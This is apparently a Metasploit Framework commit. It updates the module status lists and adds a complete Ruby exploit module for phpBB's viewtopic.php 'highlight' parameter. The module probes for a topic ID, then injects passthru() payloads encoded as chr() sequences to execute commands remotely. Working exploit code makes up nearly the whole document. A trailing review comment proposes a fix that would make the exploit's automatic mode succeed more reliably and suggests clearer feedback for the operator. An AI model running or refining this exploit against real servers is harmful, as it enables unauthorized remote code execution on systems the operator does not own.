phpBB2_highlight module port
git-svn-id: file:///home/svn/framework3/trunk@5432 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c546d6ec9c
commit
1f7eb2147f
|
@ -9,7 +9,6 @@ Unfinished modules
|
|||
hpux_ftpd_preauth_list
|
||||
iis_source_dumper
|
||||
lyris_attachment_mssql
|
||||
phpbb_highlight
|
||||
phpnuke_search_module
|
||||
realvnc_41_bypass
|
||||
samba_trans2open
|
||||
|
@ -17,7 +16,6 @@ Unfinished modules
|
|||
smb_sniffer
|
||||
solaris_kcms_readfile
|
||||
solaris_snmpxdmid
|
||||
sphpblog_file_upload
|
||||
sybase_easerver
|
||||
sygate_policy_manager
|
||||
uow_imap4_copy
|
||||
|
@ -120,6 +118,7 @@ Completed modules
|
|||
php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
|
||||
php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
|
||||
php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
|
||||
phpbb_highlight exploit/unix/webapp/phpbb_highlight
|
||||
poptop_negative_read exploit/linux/pptp/poptop_negative_read
|
||||
privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
|
||||
putty_ssh exploit/windows/ssh/putty_msg_debug
|
||||
|
@ -144,6 +143,7 @@ Completed modules
|
|||
solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
|
||||
solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
|
||||
solaris_ttyprompt exploit/solaris/telnet/ttyprompt
|
||||
sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
|
||||
squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
|
||||
svnserve_date exploit/multi/svn/svnserve_date
|
||||
tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
|
||||
|
|
|
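--- /dev/null
+++ b/modules/exploits/unix/webapp/phpbb_highlight.rb
@@ -0,0 +1,131 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Unix::Webapp::PHPBB_Highlight < Msf::Exploit::Remote
+
+include Exploit::Remote::HttpClient
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
+'Description' => %q{
+This module exploits two arbitrary PHP code execution flaws in the
+phpBB forum system. The problem is that the 'highlight' parameter
+in the 'viewtopic.php' script is not verified properly and will
+allow an attacker to inject arbitrary code via preg_replace().
+},
+'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
+'License' => MSF_LICENSE,
+'Version' => '$Revision$',
+'References' =>
+[
+[ 'OSVDB', '11719'],
+[ 'OSVDB', '17613'],
+[ 'CVE', '2005-2086'],
+[ 'CVE', '2004-1315'],
+[ 'BID', '14086'],
+[ 'BID', '10701'],
+],
+'Privileged' => false,
+'Payload' =>
+{
+'DisableNops' => true,
+'Space' => 1024,
+},
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Targets' =>
+[
+[ 'Automatic', { }],
+[ 'phpbb <=2.0.10', { }],
+[ 'phpbb <=2.0.15', { }],
+],
+'DisclosureDate' => 'Nov 12 2004',
+'DefaultTarget' => 0))
+
+register_options(
+[
+OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
+OptString.new('TOPIC', [false, "The ID of a valid topic"]),
+], self.class)
+end
+
+def find_topic
+
+1.upto(32) do |x|
+
+res = send_request_raw({
+'uri' => datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
+}, 25)
+
+if (res and res.body.match(/class="postdetails"/))
+print_status("Discovered valid topic ID: #{x}")
+return x
+end
+
+end
+return false
+
+end
+
+def exploit
+
+topic = datastore['TOPIC'] || find_topic
+
+if !(topic)
+print_status("No valid topic ID found, please specify the TOPIC option.")
+return
+else
+
+sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
+
+case target.name
+when /Automatic/
+req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
+
+res = send_request_raw({
+'uri' => datastore['URI'] + req
+}, 25)
+
+print_status("Trying to determine which attack method to use...")
+
+if (res and res.body =~ /\<title>phpinfo/)
+byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
+sploit << "%2527%252epassthru(#{byte})%252e%2527"
+else
+byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
+sploit << "%27.passthru(#{byte}).%27"
+end
+
+when /2\.0\.10/
+byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
+sploit << "%2527%252epassthru(#{byte})%252e%2527"
+when /2\.0\.15/
+byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
+sploit << "%27.passthru(#{byte}).%27"
+end
+
+res = send_request_raw({
+'uri' => sploit
+}, 25)
+
+end
+
+end
+
+end
+end
+
+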
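Review bot: find_topic probes `viewtopic.php?topic=N` while the exploit requests in the same file use `viewtopic.php?t=N`; if the target only honours `t` (which is what the exploit path assumes), the probe never renders a topic page, the `class="postdetails"` match never fires, and Automatic mode always stops at "No valid topic ID found" unless TOPIC is set by hand. Making the probe consistent is a one-line change: `'uri' => datastore['URI'] + '/viewtopic.php?t=' + x.to_s,`. A smaller point: the final `res = send_request_raw(...)` result is discarded, so a 404, a timeout (nil) or a WAF block gives the operator no feedback; a `print_status` on `res.nil?` or on `res.code` before returning would help triage. The enclosing class and both methods are complete within this hunk.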